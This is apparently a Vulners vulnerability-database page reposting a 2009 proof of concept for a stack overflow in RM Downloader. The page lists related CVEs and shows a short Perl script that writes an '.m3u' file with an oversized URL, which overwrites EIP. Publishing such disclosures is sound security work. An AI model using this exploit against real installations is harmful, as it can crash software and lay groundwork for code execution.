Lucene search
+L

RM Downloader - '.m3u' Local Stack Overflow (PoC)

🗓️ 13 Apr 2009 00:00:00Reported by Cyber-ZoneType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

RM Downloader '.m3u' Local Stack Overflow Po

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow (ASLR and DEP Bypass)
27 Jul 201200:00
zdt
0day.today
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)
13 Jun 201600:00
zdt
Circl
CVE-2009-1324
13 Apr 200900:00
circl
Circl
CVE-2009-1325
13 Apr 200900:00
circl
Circl
CVE-2009-1326
13 Apr 200900:00
circl
Circl
CVE-2009-1327
13 Apr 200900:00
circl
Circl
CVE-2009-1328
13 Apr 200900:00
circl
Circl
CVE-2009-1329
13 Apr 200900:00
circl
Circl
CVE-2009-1330
13 Apr 200900:00
circl
CVE
CVE-2009-1324
17 Apr 200910:00
cve
Rows per page
#!/usr/bin/perl
#
#
# *********************************************************
# *  RM Downloader (.M3U File) Local Stack Overflow POC   *
# *********************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail   : [email protected]
# Home     : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz   : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 7C92056D ntdll.7C92056D
#EDX 00A20000
#EBX 00104A54
#ESP 000FFE3C
#EBP 00333E98 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESI 77C2FCE0 MSVCRT.77C2FCE0
#EDI 0000660D
#EIP 41414141
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26109;# just Poc tested under MS windows SP2 Fr

open(MYFILE,'>>KHAL.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

# milw0rm.com [2009-04-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Apr 2009 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.21664
34